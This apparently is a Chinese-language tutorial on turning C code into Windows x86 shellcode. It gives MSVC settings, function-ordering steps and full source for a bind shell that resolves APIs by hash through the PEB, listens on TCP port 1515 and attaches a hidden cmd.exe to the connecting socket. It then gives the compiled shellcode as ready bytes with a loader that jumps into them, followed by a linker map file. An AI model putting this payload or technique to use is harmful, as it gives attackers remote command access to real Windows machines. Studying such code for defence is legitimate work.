首先修改配置
然后改函数生成顺序(这里要先生成一遍才能看到)
先生成映射文件
再用一个记事本修改顺序再生成一遍
重新生成
运行成功
获取shellcode
先找到布局
一直到main函数
测试(关掉dep)
#include"stdafx.h"
#include <winsock2.h>
#include <windows.h>
// C/C++
// |-常规
// | |-调试信息格式:程序数据库(/Zi)
// | *-SDL检查:否(/sdl-)
// |-优化
// | |-优化:使大小最优化(/O1)
// | |-内联函数扩展:已禁用(/Ob0)
// | |-启用内部函数:否
// | |-优选大小或者速度:代码大小优先(/Os)
// | *-全程序优化:是(/GL)
// *-代码生成
// |-基本运行时检查:默认值
// |-安全检查:禁用安全检查(/GS-)
// *-启用函数级连接:是(/Gy)
//
// 链接器
// |-常规
// | *-启用增量连接:否(/INCREMENTAL:NO)
// |-调试
// | |-生成映射文件:是(/MAP)
// | *-映射文件名:mpafile
// *-优化
// |-引用:是(/OPT:REF)
// |-启用COMDAT折叠:是(/OPT:ICF)
// *-函数顺序:FunctionOrder.txt
// [注:FunctionOrder.txt控制编译器按照指定顺序将特定的COMDAT放到映像文件中]
#define HASH_LoadLibraryExA 0xC0D83287
#define HASH_ExitProcess 0x4FD18963
#define HASH_WSAStartup 0x80B46A3D
#define HASH_WSASocketA 0xDE78322D
#define HASH_htons 0xDDBFA6F3
#define HASH_bind 0xDDA71064
#define HASH_listen 0x4BD39F0C
#define HASH_accept 0x01971EB1
#define HASH_CreateProcessA 0x6BA6BCC9
int GetFunAddrByHash(int nHashDigest);
#define DefineFuncPtr(name,base) decltype(name) *My_##name = (decltype(name)*)GetFunAddrByHash(HASH_##name,base)
void MemZero(PBYTE lpBuff, int nSize)
{
__asm {
mov edi, lpBuff
xor eax, eax
mov ecx, nSize
cld
rep stosb
}
}
bool Hash_CmpString(char *strFunName, int nHash)
{
unsigned int nDigest = 0;
while (*strFunName)
{
nDigest = ((nDigest << 25) | (nDigest >> 7));
nDigest = nDigest + *strFunName;
strFunName++;
}
return nHash == nDigest ? true : false;
}
int GetFunAddrByHash(int nHashDigest, HMODULE hModule)
{
// 1. 获取DOS头、NT头
PIMAGE_DOS_HEADER pDos_Header;
PIMAGE_NT_HEADERS pNt_Header;
pDos_Header = (PIMAGE_DOS_HEADER)hModule;
pNt_Header = (PIMAGE_NT_HEADERS)((DWORD)hModule + pDos_Header->e_lfanew);
// 2. 获取导出表项
PIMAGE_DATA_DIRECTORY pDataDir;
PIMAGE_EXPORT_DIRECTORY pExport;
pDataDir = pNt_Header->OptionalHeader.DataDirectory + IMAGE_DIRECTORY_ENTRY_EXPORT;
pExport = (PIMAGE_EXPORT_DIRECTORY)((DWORD)hModule + pDataDir->VirtualAddress);
// 3. 获取导出表详细信息
PDWORD pAddrOfFun = (PDWORD)(pExport->AddressOfFunctions + (DWORD)hModule);
PDWORD pAddrOfNames = (PDWORD)(pExport->AddressOfNames + (DWORD)hModule);
PWORD pAddrOfOrdinals = (PWORD)(pExport->AddressOfNameOrdinals + (DWORD)hModule);
// 4. 处理以函数名查找函数地址的请求,循环获取ENT中的函数名(因为是以函数名
// 为基准,因此不考虑无函数名的情况),并与传入值对比,如能匹配上则在EAT
// 中以指定序号作为索引,并取出其地址值。
DWORD dwFunAddr;
for (DWORD i = 0; i<pExport->NumberOfNames; i++)
{
PCHAR lpFunName = (PCHAR)(pAddrOfNames[i] + (DWORD)hModule);
if (Hash_CmpString(lpFunName, nHashDigest))
{
dwFunAddr = pAddrOfFun[pAddrOfOrdinals[i]] + (DWORD)hModule;
break;
}
if (i == pExport->NumberOfNames - 1)
return 0;
}
return dwFunAddr;
}
void EntryPoint()
{
// 1. 局部字符串
CHAR szKernel32[] = { 'k','e','r','n','e','l','3','2','.','d','l','l','\0' };
CHAR szWs2_32[] = { 'w','s','2','_','3','2','.','d','l','l','\0' };
CHAR szCMD[] = { 'c','m','d','.','e','x','e','\0' };
// 2. 获取关键模块基址
HMODULE hKeyModule = 0;
__asm
{
push esi
mov esi, dword ptr fs : [0x30] // esi = PEB的地址
mov esi, [esi + 0x0C] // esi = 指向PEB_LDR_DATA结构的指针
mov esi, [esi + 0x1C] // esi = 模块链表指针InInit...List
mov esi, [esi] // esi = 访问链表中的第二个条目
mov esi, [esi + 0x08] // esi = 获取Kernel32.dll基址(注1)
mov hKeyModule, esi
pop esi
}// 注1:Win7下获取的是KernelBase.dll的基址
// 3. 获取关键模块基址
DefineFuncPtr(LoadLibraryExA, hKeyModule);
HMODULE hKernel32 = My_LoadLibraryExA(szKernel32, 0, 0);
HMODULE hWs2_32 = My_LoadLibraryExA(szWs2_32, 0, 0);
// 4. 初始化Winsock服务
WSADATA stWSA;
DefineFuncPtr(WSAStartup, hWs2_32);
My_WSAStartup(0x0202, &stWSA);
// 5. 创建一个原始套接字
SOCKET stListen = INVALID_SOCKET;;
DefineFuncPtr(WSASocketA, hWs2_32);
stListen = My_WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP, 0, 0, 0);
// 6. 在任意地址(INADDR_ANY)上绑定一个端口1515
DefineFuncPtr(htons, hWs2_32);
SOCKADDR_IN stService;
stService.sin_addr.s_addr = INADDR_ANY;
stService.sin_port = My_htons(1515);
stService.sin_family = AF_INET;
DefineFuncPtr(bind, hWs2_32);
My_bind(stListen, (LPSOCKADDR)&stService, sizeof(stService));
// 7. 监听连接(等待连接)
DefineFuncPtr(listen, hWs2_32);
My_listen(stListen, SOMAXCONN);
// 8. 接受一个连接
DefineFuncPtr(accept, hWs2_32);
stListen = My_accept(stListen, 0, 0);
// 9. 创建一个CMD进程,并将其输入与输出重定位到我们创建的套接字上
PROCESS_INFORMATION stPI;
STARTUPINFOA stSI;
MemZero((PBYTE)&stSI, sizeof(stSI));
stSI.cb = sizeof(stSI);
stSI.wShowWindow = SW_HIDE;
stSI.dwFlags = STARTF_USESTDHANDLES;
stSI.hStdInput = (HANDLE)stListen;
stSI.hStdOutput = (HANDLE)stListen;
stSI.hStdError = (HANDLE)stListen;
DefineFuncPtr(CreateProcessA, hKernel32);
My_CreateProcessA(0, szCMD, 0, 0, TRUE, 0, 0, 0, &stSI, &stPI);
// A. 关闭相关句柄并释放相关资源
//closesocket(stListen);
//WSACleanup();
DefineFuncPtr(ExitProcess, hKernel32);
My_ExitProcess(0);
}
int _tmain(int argc, TCHAR* argv[])
{
char bShellcode[] = { "\x55\x8B\xEC\x81\xEC\x1C\x02\x00\x00\x53\x33\xDB\xC7\x45\xDC\x6B\x65\x72\x6E\x56\x57\xC7\x45\xE0\x65\x6C\x33\x32\xC7\x45\xE4\x2E\x64\x6C\x6C\x88\x5D\xE8\xC7\x45\xEC\x77\x73\x32\x5F\xC7\x45\xF0\x33\x32\x2E\x64\x66\xC7\x45\xF4\x6C\x6C\x88\x5D\xF6\xC7\x45\xF8\x63\x6D\x64\x2E\xC7\x45\xFC\x65\x78\x65\x00\x89\x5D\xD8\x56\x64\x8B\x35\x30\x00\x00\x00\x8B\x76\x0C\x8B\x76\x1C\x8B\x36\x8B\x76\x08\x89\x75\xD8\x5E\xFF\x75\xD8\x68\x87\x32\xD8\xC0\xE8\x1E\x01\x00\x00\x59\x59\x53\x8B\xF0\x8D\x45\xDC\x53\x50\xFF\xD6\x6A\x00\x8B\xD8\x8D\x45\xEC\x6A\x00\x50\xFF\xD6\x8B\xF8\x8D\x85\xE4\xFD\xFF\xFF\x50\x68\x02\x02\x00\x00\x57\x68\x3D\x6A\xB4\x80\xE8\xED\x00\x00\x00\x59\x59\xFF\xD0\x57\x68\x2D\x32\x78\xDE\xE8\xDE\x00\x00\x00\x59\x59\x33\xC9\x51\x51\x51\x6A\x06\x6A\x01\x6A\x02\x59\x51\xFF\xD0\x57\x68\xF3\xA6\xBF\xDD\x8B\xF0\xE8\xC0\x00\x00\x00\x83\x65\xCC\x00\x59\x59\x68\xEB\x05\x00\x00\xFF\xD0\x6A\x02\x66\x89\x45\xCA\x58\x6A\x10\x66\x89\x45\xC8\x8D\x45\xC8\x50\x56\x57\x68\x64\x10\xA7\xDD\xE8\x96\x00\x00\x00\x59\x59\xFF\xD0\x68\xFF\xFF\xFF\x7F\x56\x57\x68\x0C\x9F\xD3\x4B\xE8\x81\x00\x00\x00\x59\x59\xFF\xD0\x57\x68\xB1\x1E\x97\x01\xE8\x72\x00\x00\x00\x59\x59\x6A\x00\x6A\x00\x56\xFF\xD0\x6A\x44\x5F\x8B\xF0\x8D\x45\x84\x57\x50\xE8\xF2\x00\x00\x00\x59\x59\x33\xC0\x89\x75\xBC\x66\x89\x45\xB4\x8D\x85\x74\xFF\xFF\xFF\x50\x8D\x45\x84\x89\x75\xC0\x50\x89\x75\xC4\x8D\x45\xF8\x33\xF6\x89\x7D\x84\x56\x56\x56\x6A\x01\x56\x56\x50\x56\x53\x68\xC9\xBC\xA6\x6B\xC7\x45\xB0\x00\x01\x00\x00\xE8\x1B\x00\x00\x00\x59\x59\xFF\xD0\x56\x53\x68\x63\x89\xD1\x4F\xE8\x0B\x00\x00\x00\x59\x59\xFF\xD0\x5F\x5E\x5B\x8B\xE5\x5D\xC3\x55\x8B\xEC\x51\x51\x53\x56\x57\x8B\x7D\x0C\x33\xF6\x8B\x47\x3C\x8B\x44\x38\x78\x03\xC7\x8B\x48\x1C\x8B\x50\x20\x03\xCF\x8B\x58\x18\x03\xD7\x89\x4D\xF8\x8B\x48\x24\x03\xCF\x89\x55\x0C\x89\x4D\xFC\x85\xDB\x74\x23\x8B\x04\xB2\xFF\x75\x08\x03\xC7\x50\xE8\x34\x00\x00\x00\x59\x59\x84\xC0\x75\x1D\x8D\x43\xFF\x3B\xF0\x74\x12\x8B\x55\x0C\x46\x3B\xF3\x72\xDD\x8B\x45\x0C\x5F\x5E\x5B\x8B\xE5\x5D\xC3\x33\xC0\xEB\xF5\x8B\x45\xFC\x8B\x4D\xF8\x0F\xB7\x04\x70\x8B\x04\x81\x03\xC7\xEB\xE4\x55\x8B\xEC\x8B\x55\x08\x33\xC9\xEB\x09\xC1\xC9\x07\x0F\xBE\xC0\x03\xC8\x42\x8A\x02\x84\xC0\x75\xF1\x39\x4D\x0C\x0F\x94\xC0\x5D\xC3\x55\x8B\xEC\x57\x8B\x7D\x08\x33\xC0\x8B\x4D\x0C\xFC\xF3\xAA\x5F\x5D\xC3" };
__asm {
lea eax, bShellcode;
push eax;
ret
}
//EntryPoint();
return 0;
}
{
0x55, 0x8B, 0xEC, 0x81, 0xEC, 0x1C, 0x02, 0x00, 0x00, 0x53, 0x33, 0xDB, 0xC7, 0x45, 0xDC, 0x6B,
0x65, 0x72, 0x6E, 0x56, 0x57, 0xC7, 0x45, 0xE0, 0x65, 0x6C, 0x33, 0x32, 0xC7, 0x45, 0xE4, 0x2E,
0x64, 0x6C, 0x6C, 0x88, 0x5D, 0xE8, 0xC7, 0x45, 0xEC, 0x77, 0x73, 0x32, 0x5F, 0xC7, 0x45, 0xF0,
0x33, 0x32, 0x2E, 0x64, 0x66, 0xC7, 0x45, 0xF4, 0x6C, 0x6C, 0x88, 0x5D, 0xF6, 0xC7, 0x45, 0xF8,
0x63, 0x6D, 0x64, 0x2E, 0xC7, 0x45, 0xFC, 0x65, 0x78, 0x65, 0x00, 0x89, 0x5D, 0xD8, 0x56, 0x64,
0x8B, 0x35, 0x30, 0x00, 0x00, 0x00, 0x8B, 0x76, 0x0C, 0x8B, 0x76, 0x1C, 0x8B, 0x36, 0x8B, 0x76,
0x08, 0x89, 0x75, 0xD8, 0x5E, 0xFF, 0x75, 0xD8, 0x68, 0x87, 0x32, 0xD8, 0xC0, 0xE8, 0x1E, 0x01,
0x00, 0x00, 0x59, 0x59, 0x53, 0x8B, 0xF0, 0x8D, 0x45, 0xDC, 0x53, 0x50, 0xFF, 0xD6, 0x6A, 0x00,
0x8B, 0xD8, 0x8D, 0x45, 0xEC, 0x6A, 0x00, 0x50, 0xFF, 0xD6, 0x8B, 0xF8, 0x8D, 0x85, 0xE4, 0xFD,
0xFF, 0xFF, 0x50, 0x68, 0x02, 0x02, 0x00, 0x00, 0x57, 0x68, 0x3D, 0x6A, 0xB4, 0x80, 0xE8, 0xED,
0x00, 0x00, 0x00, 0x59, 0x59, 0xFF, 0xD0, 0x57, 0x68, 0x2D, 0x32, 0x78, 0xDE, 0xE8, 0xDE, 0x00,
0x00, 0x00, 0x59, 0x59, 0x33, 0xC9, 0x51, 0x51, 0x51, 0x6A, 0x06, 0x6A, 0x01, 0x6A, 0x02, 0x59,
0x51, 0xFF, 0xD0, 0x57, 0x68, 0xF3, 0xA6, 0xBF, 0xDD, 0x8B, 0xF0, 0xE8, 0xC0, 0x00, 0x00, 0x00,
0x83, 0x65, 0xCC, 0x00, 0x59, 0x59, 0x68, 0xEB, 0x05, 0x00, 0x00, 0xFF, 0xD0, 0x6A, 0x02, 0x66,
0x89, 0x45, 0xCA, 0x58, 0x6A, 0x10, 0x66, 0x89, 0x45, 0xC8, 0x8D, 0x45, 0xC8, 0x50, 0x56, 0x57,
0x68, 0x64, 0x10, 0xA7, 0xDD, 0xE8, 0x96, 0x00, 0x00, 0x00, 0x59, 0x59, 0xFF, 0xD0, 0x68, 0xFF,
0xFF, 0xFF, 0x7F, 0x56, 0x57, 0x68, 0x0C, 0x9F, 0xD3, 0x4B, 0xE8, 0x81, 0x00, 0x00, 0x00, 0x59,
0x59, 0xFF, 0xD0, 0x57, 0x68, 0xB1, 0x1E, 0x97, 0x01, 0xE8, 0x72, 0x00, 0x00, 0x00, 0x59, 0x59,
0x6A, 0x00, 0x6A, 0x00, 0x56, 0xFF, 0xD0, 0x6A, 0x44, 0x5F, 0x8B, 0xF0, 0x8D, 0x45, 0x84, 0x57,
0x50, 0xE8, 0xF2, 0x00, 0x00, 0x00, 0x59, 0x59, 0x33, 0xC0, 0x89, 0x75, 0xBC, 0x66, 0x89, 0x45,
0xB4, 0x8D, 0x85, 0x74, 0xFF, 0xFF, 0xFF, 0x50, 0x8D, 0x45, 0x84, 0x89, 0x75, 0xC0, 0x50, 0x89,
0x75, 0xC4, 0x8D, 0x45, 0xF8, 0x33, 0xF6, 0x89, 0x7D, 0x84, 0x56, 0x56, 0x56, 0x6A, 0x01, 0x56,
0x56, 0x50, 0x56, 0x53, 0x68, 0xC9, 0xBC, 0xA6, 0x6B, 0xC7, 0x45, 0xB0, 0x00, 0x01, 0x00, 0x00,
0xE8, 0x1B, 0x00, 0x00, 0x00, 0x59, 0x59, 0xFF, 0xD0, 0x56, 0x53, 0x68, 0x63, 0x89, 0xD1, 0x4F,
0xE8, 0x0B, 0x00, 0x00, 0x00, 0x59, 0x59, 0xFF, 0xD0, 0x5F, 0x5E, 0x5B, 0x8B, 0xE5, 0x5D, 0xC3,
0x55, 0x8B, 0xEC, 0x51, 0x51, 0x53, 0x56, 0x57, 0x8B, 0x7D, 0x0C, 0x33, 0xF6, 0x8B, 0x47, 0x3C,
0x8B, 0x44, 0x38, 0x78, 0x03, 0xC7, 0x8B, 0x48, 0x1C, 0x8B, 0x50, 0x20, 0x03, 0xCF, 0x8B, 0x58,
0x18, 0x03, 0xD7, 0x89, 0x4D, 0xF8, 0x8B, 0x48, 0x24, 0x03, 0xCF, 0x89, 0x55, 0x0C, 0x89, 0x4D,
0xFC, 0x85, 0xDB, 0x74, 0x23, 0x8B, 0x04, 0xB2, 0xFF, 0x75, 0x08, 0x03, 0xC7, 0x50, 0xE8, 0x34,
0x00, 0x00, 0x00, 0x59, 0x59, 0x84, 0xC0, 0x75, 0x1D, 0x8D, 0x43, 0xFF, 0x3B, 0xF0, 0x74, 0x12,
0x8B, 0x55, 0x0C, 0x46, 0x3B, 0xF3, 0x72, 0xDD, 0x8B, 0x45, 0x0C, 0x5F, 0x5E, 0x5B, 0x8B, 0xE5,
0x5D, 0xC3, 0x33, 0xC0, 0xEB, 0xF5, 0x8B, 0x45, 0xFC, 0x8B, 0x4D, 0xF8, 0x0F, 0xB7, 0x04, 0x70,
0x8B, 0x04, 0x81, 0x03, 0xC7, 0xEB, 0xE4, 0x55, 0x8B, 0xEC, 0x8B, 0x55, 0x08, 0x33, 0xC9, 0xEB,
0x09, 0xC1, 0xC9, 0x07, 0x0F, 0xBE, 0xC0, 0x03, 0xC8, 0x42, 0x8A, 0x02, 0x84, 0xC0, 0x75, 0xF1,
0x39, 0x4D, 0x0C, 0x0F, 0x94, 0xC0, 0x5D, 0xC3, 0x55, 0x8B, 0xEC, 0x57, 0x8B, 0x7D, 0x08, 0x33,
0xC0, 0x8B, 0x4D, 0x0C, 0xFC, 0xF3, 0xAA, 0x5F, 0x5D, 0xC3
};
ConsoleApplication3
Timestamp is 5b177c59 (Wed Jun 6 14:16:57 2018)
Preferred load address is 00400000
Start Length Name Class
0001:00000000 00001316H .text$mn CODE
0002:00000000 000000a4H .idata$5 DATA
0002:000000a4 00000004H .00cfg DATA
0002:000000a8 00000004H .CRT$XCA DATA
0002:000000ac 00000004H .CRT$XCAA DATA
0002:000000b0 00000004H .CRT$XCZ DATA
0002:000000b4 00000004H .CRT$XIA DATA
0002:000000b8 00000004H .CRT$XIAA DATA
0002:000000bc 00000004H .CRT$XIAC DATA
0002:000000c0 00000004H .CRT$XIZ DATA
0002:000000c4 00000004H .CRT$XPA DATA
0002:000000c8 00000004H .CRT$XPZ DATA
0002:000000cc 00000004H .CRT$XTA DATA
0002:000000d0 00000010H .CRT$XTZ DATA
0002:000000e0 00000310H .rdata DATA
0002:000003f0 00000004H .rdata$sxdata DATA
0002:000003f4 000002e8H .rdata$zzzdbg DATA
0002:000006dc 00000004H .rtc$IAA DATA
0002:000006e0 00000004H .rtc$IZZ DATA
0002:000006e4 00000004H .rtc$TAA DATA
0002:000006e8 00000008H .rtc$TZZ DATA
0002:000006f0 0000003cH .xdata$x DATA
0002:0000072c 00000000H .edata DATA
0002:0000072c 0000003cH .idata$2 DATA
0002:00000768 00000014H .idata$3 DATA
0002:0000077c 000000a4H .idata$4 DATA
0002:00000820 0000032aH .idata$6 DATA
0003:00000000 00000018H .data DATA
0003:00000018 00000374H .bss DATA
0004:00000000 00000020H .gfids$y DATA
0005:00000000 00000060H .rsrc$01 DATA
0005:00000060 00000180H .rsrc$02 DATA
Address Publics by Value Rva+Base Lib:Object
0000:00000000 ___guard_longjmp_table 00000000 <absolute>
0000:00000000 ___guard_iat_count 00000000 <absolute>
0000:00000000 ___guard_fids_table 00000000 <absolute>
0000:00000000 ___dynamic_value_reloc_table 00000000 <absolute>
0000:00000000 ___guard_fids_count 00000000 <absolute>
0000:00000000 ___guard_longjmp_count 00000000 <absolute>
0000:00000000 ___guard_iat_table 00000000 <absolute>
0000:00000001 ___safe_se_handler_count 00000001 <absolute>
0000:00000100 ___guard_flags 00000100 <absolute>
0000:00000000 ___ImageBase 00400000 <linker-defined>
0001:00000000 _wmain 00401000 f ConsoleApplication3.obj
0001:00000340 ?configure_argv@__scrt_wide_argv_policy@@SAHXZ 00401340 f i MSVCRTD:exe_wmain.obj
0001:000003a0 _wmainCRTStartup 004013a0 f MSVCRTD:exe_wmain.obj
0001:000003b0 ??$__crt_fast_decode_pointer@PAP6AXXZ@@YAPAP6AXXZQAP6AXXZ@Z 004013b0 f i MSVCRTD:utility.obj
0001:000003e0 ??$__crt_fast_encode_pointer@PAP6AXXZ@@YAPAP6AXXZQAP6AXXZ@Z 004013e0 f i MSVCRTD:utility.obj
0001:00000410 ?__crt_rotate_pointer_value@@YAIIH@Z 00401410 f i MSVCRTD:utility.obj
0001:00000520 _NtCurrentTeb 00401520 f i MSVCRTD:utility.obj
0001:00000530 ___scrt_acquire_startup_lock 00401530 f MSVCRTD:utility.obj
0001:00000580 ___scrt_initialize_crt 00401580 f MSVCRTD:utility.obj
0001:000005d0 ___scrt_initialize_onexit_tables 004015d0 f MSVCRTD:utility.obj
0001:000006a0 ___scrt_is_nonwritable_in_current_image 004016a0 f MSVCRTD:utility.obj
0001:000007d0 ___scrt_release_startup_lock 004017d0 f MSVCRTD:utility.obj
0001:00000800 ___scrt_uninitialize_crt 00401800 f MSVCRTD:utility.obj
0001:00000840 __onexit 00401840 f MSVCRTD:utility.obj
0001:000008b0 _atexit 004018b0 f MSVCRTD:utility.obj
0001:000008e0 ___security_init_cookie 004018e0 f MSVCRTD:gs_support.obj
0001:000009c0 __get_startup_thread_locale_mode 004019c0 f MSVCRTD:thread_locale.obj
0001:000009c0 __matherr 004019c0 f MSVCRTD:matherr.obj
0001:000009c0 __get_startup_new_mode 004019c0 f MSVCRTD:new_mode.obj
0001:000009c0 ___scrt_initialize_winrt 004019c0 f MSVCRTD:utility_desktop.obj
0001:000009c0 __get_startup_commit_mode 004019c0 f MSVCRTD:commit_mode.obj
0001:000009d0 __get_startup_argv_mode 004019d0 f MSVCRTD:argv_mode.obj
0001:000009d0 ?get_app_type@__scrt_main_policy@@SA?AW4_crt_app_type@@XZ 004019d0 f MSVCRTD:exe_wmain.obj
0001:000009e0 __get_startup_file_mode 004019e0 f MSVCRTD:file_mode.obj
0001:000009f0 ?__scrt_initialize_type_info@@YAXXZ 004019f0 f MSVCRTD:tncleanup.obj
0001:00000a00 ___acrt_uninitialize 00401a00 f MSVCRTD:ucrt_stubs.obj
0001:00000a00 ___vcrt_uninitialize 00401a00 f MSVCRTD:ucrt_stubs.obj
0001:00000a00 ___scrt_stub_for_acrt_uninitialize 00401a00 f MSVCRTD:ucrt_stubs.obj
0001:00000a00 __should_initialize_environment 00401a00 f MSVCRTD:env_mode.obj
0001:00000a00 ___vcrt_initialize 00401a00 f MSVCRTD:ucrt_stubs.obj
0001:00000a00 ___scrt_stub_for_acrt_initialize 00401a00 f MSVCRTD:ucrt_stubs.obj
0001:00000a00 ___acrt_initialize 00401a00 f MSVCRTD:ucrt_stubs.obj
0001:00000a10 __initialize_default_precision 00401a10 f MSVCRTD:default_precision.obj
0001:00000a40 __initialize_invalid_parameter_handler 00401a40 f MSVCRTD:invalid_parameter_handler.obj
0001:00000a40 __initialize_denormal_control 00401a40 f MSVCRTD:denormal_control.obj
0001:00000a50 ___local_stdio_printf_options 00401a50 f i MSVCRTD:default_local_stdio_options.obj
0001:00000a60 ___local_stdio_scanf_options 00401a60 f i MSVCRTD:default_local_stdio_options.obj
0001:00000a70 ___scrt_initialize_default_local_stdio_options 00401a70 f MSVCRTD:default_local_stdio_options.obj
0001:00000ab0 ___scrt_is_user_matherr_present 00401ab0 f MSVCRTD:matherr_detection.obj
0001:00000ae0 ___scrt_get_dyn_tls_init_callback 00401ae0 f MSVCRTD:dyn_tls_init.obj
0001:00000af0 ___scrt_get_dyn_tls_dtor_callback 00401af0 f MSVCRTD:dyn_tls_dtor.obj
0001:00000b00 ___scrt_fastfail 00401b00 f MSVCRTD:utility_desktop.obj
0001:00000c40 ___scrt_is_managed_app 00401c40 f MSVCRTD:utility_desktop.obj
0001:00000cd0 ___scrt_set_unhandled_exception_filter 00401cd0 f MSVCRTD:utility_desktop.obj
0001:00000ce0 ___scrt_unhandled_exception_filter@4 00401ce0 f MSVCRTD:utility_desktop.obj
0001:00000d40 __crt_debugger_hook 00401d40 f MSVCRTD:utility_desktop.obj
0001:00000d50 __RTC_Initialize 00401d50 f MSVCRTD:_initsect_.obj
0001:00000d80 __RTC_Terminate 00401d80 f MSVCRTD:_initsect_.obj
0001:00000db0 @_guard_check_icall@4 00401db0 f i MSVCRTD:checkcfg.obj
0001:00000dd0 __except_handler4 00401dd0 f MSVCRTD:_chandler4gs_.obj
0001:00000e00 ___isa_available_init 00401e00 f MSVCRTD:_cpu_disp_.obj
0001:000010e0 ___scrt_is_ucrt_dll_in_use 004020e0 f MSVCRTD:ucrt_detection.obj
0001:00001110 @_guard_check_icall_nop@4 00402110 f i MSVCRTD:guard_support.obj
0001:00001120 @__security_check_cookie@4 00402120 f MSVCRTD:_secchk_.obj
0001:00001140 ___raise_securityfailure 00402140 f MSVCRTD:gs_report.obj
0001:00001170 ___report_gsfailure 00402170 f MSVCRTD:gs_report.obj
0001:00001274 _memset 00402274 f vcruntimed:VCRUNTIME140D.dll
0001:0000127a __except_handler4_common 0040227a f vcruntimed:VCRUNTIME140D.dll
0001:00001280 __seh_filter_exe 00402280 f ucrtd:ucrtbased.dll
0001:00001286 __set_app_type 00402286 f ucrtd:ucrtbased.dll
0001:0000128c ___setusermatherr 0040228c f ucrtd:ucrtbased.dll
0001:00001292 __configure_wide_argv 00402292 f ucrtd:ucrtbased.dll
0001:00001298 __initialize_wide_environment 00402298 f ucrtd:ucrtbased.dll
0001:0000129e __get_initial_wide_environment 0040229e f ucrtd:ucrtbased.dll
0001:000012a4 __initterm 004022a4 f ucrtd:ucrtbased.dll
0001:000012aa __initterm_e 004022aa f ucrtd:ucrtbased.dll
0001:000012b0 _exit 004022b0 f ucrtd:ucrtbased.dll
0001:000012b6 __exit 004022b6 f ucrtd:ucrtbased.dll
0001:000012bc __set_fmode 004022bc f ucrtd:ucrtbased.dll
0001:000012c2 ___p___argc 004022c2 f ucrtd:ucrtbased.dll
0001:000012c8 ___p___wargv 004022c8 f ucrtd:ucrtbased.dll
0001:000012ce __cexit 004022ce f ucrtd:ucrtbased.dll
0001:000012d4 __c_exit 004022d4 f ucrtd:ucrtbased.dll
0001:000012da __register_thread_local_exe_atexit_callback 004022da f ucrtd:ucrtbased.dll
0001:000012e0 __configthreadlocale 004022e0 f ucrtd:ucrtbased.dll
0001:000012e6 __set_new_mode 004022e6 f ucrtd:ucrtbased.dll
0001:000012ec ___p__commode 004022ec f ucrtd:ucrtbased.dll
0001:000012f2 __initialize_onexit_table 004022f2 f ucrtd:ucrtbased.dll
0001:000012f8 __register_onexit_function 004022f8 f ucrtd:ucrtbased.dll
0001:000012fe __crt_atexit 004022fe f ucrtd:ucrtbased.dll
0001:00001304 __controlfp_s 00402304 f ucrtd:ucrtbased.dll
0001:0000130a _terminate 0040230a f ucrtd:ucrtbased.dll
0001:00001310 _IsProcessorFeaturePresent@4 00402310 f kernel32:KERNEL32.dll
0002:00000000 __imp__GetCurrentProcessId@0 00403000 kernel32:KERNEL32.dll
0002:00000004 __imp__GetCurrentThreadId@0 00403004 kernel32:KERNEL32.dll
0002:00000008 __imp__GetSystemTimeAsFileTime@4 00403008 kernel32:KERNEL32.dll
0002:0000000c __imp__TerminateProcess@8 0040300c kernel32:KERNEL32.dll
0002:00000010 __imp__GetCurrentProcess@0 00403010 kernel32:KERNEL32.dll
0002:00000014 __imp__GetModuleHandleW@4 00403014 kernel32:KERNEL32.dll
0002:00000018 __imp__IsProcessorFeaturePresent@4 00403018 kernel32:KERNEL32.dll
0002:0000001c __imp__SetUnhandledExceptionFilter@4 0040301c kernel32:KERNEL32.dll
0002:00000020 __imp__UnhandledExceptionFilter@4 00403020 kernel32:KERNEL32.dll
0002:00000024 __imp__IsDebuggerPresent@0 00403024 kernel32:KERNEL32.dll
0002:00000028 __imp__InitializeSListHead@4 00403028 kernel32:KERNEL32.dll
0002:0000002c __imp__QueryPerformanceCounter@4 0040302c kernel32:KERNEL32.dll
0002:00000030 \177KERNEL32_NULL_THUNK_DATA 00403030 kernel32:KERNEL32.dll
0002:00000034 __imp__memset 00403034 vcruntimed:VCRUNTIME140D.dll
0002:00000038 __imp___except_handler4_common 00403038 vcruntimed:VCRUNTIME140D.dll
0002:0000003c \177VCRUNTIME140D_NULL_THUNK_DATA 0040303c vcruntimed:VCRUNTIME140D.dll
0002:00000040 __imp___c_exit 00403040 ucrtd:ucrtbased.dll
0002:00000044 __imp___register_thread_local_exe_atexit_callback 00403044 ucrtd:ucrtbased.dll
0002:00000048 __imp___configthreadlocale 00403048 ucrtd:ucrtbased.dll
0002:0000004c __imp___set_new_mode 0040304c ucrtd:ucrtbased.dll
0002:00000050 __imp____p__commode 00403050 ucrtd:ucrtbased.dll
0002:00000054 __imp___cexit 00403054 ucrtd:ucrtbased.dll
0002:00000058 __imp___initialize_onexit_table 00403058 ucrtd:ucrtbased.dll
0002:0000005c __imp___register_onexit_function 0040305c ucrtd:ucrtbased.dll
0002:00000060 __imp___crt_atexit 00403060 ucrtd:ucrtbased.dll
0002:00000064 __imp___controlfp_s 00403064 ucrtd:ucrtbased.dll
0002:00000068 __imp__terminate 00403068 ucrtd:ucrtbased.dll
0002:0000006c __imp____p___wargv 0040306c ucrtd:ucrtbased.dll
0002:00000070 __imp____p___argc 00403070 ucrtd:ucrtbased.dll
0002:00000074 __imp___set_fmode 00403074 ucrtd:ucrtbased.dll
0002:00000078 __imp___exit 00403078 ucrtd:ucrtbased.dll
0002:0000007c __imp__exit 0040307c ucrtd:ucrtbased.dll
0002:00000080 __imp___initterm_e 00403080 ucrtd:ucrtbased.dll
0002:00000084 __imp___initterm 00403084 ucrtd:ucrtbased.dll
0002:00000088 __imp___get_initial_wide_environment 00403088 ucrtd:ucrtbased.dll
0002:0000008c __imp___initialize_wide_environment 0040308c ucrtd:ucrtbased.dll
0002:00000090 __imp___configure_wide_argv 00403090 ucrtd:ucrtbased.dll
0002:00000094 __imp____setusermatherr 00403094 ucrtd:ucrtbased.dll
0002:00000098 __imp___set_app_type 00403098 ucrtd:ucrtbased.dll
0002:0000009c __imp___seh_filter_exe 0040309c ucrtd:ucrtbased.dll
0002:000000a0 \177ucrtbased_NULL_THUNK_DATA 004030a0 ucrtd:ucrtbased.dll
0002:000000a4 ___guard_check_icall_fptr 004030a4 MSVCRTD:guard_support.obj
0002:000000a8 ___xc_a 004030a8 MSVCRTD:initializers.obj
0002:000000b0 ___xc_z 004030b0 MSVCRTD:initializers.obj
0002:000000b4 ___xi_a 004030b4 MSVCRTD:initializers.obj
0002:000000c0 ___xi_z 004030c0 MSVCRTD:initializers.obj
0002:000000c4 ___xp_a 004030c4 MSVCRTD:initializers.obj
0002:000000c8 ___xp_z 004030c8 MSVCRTD:initializers.obj
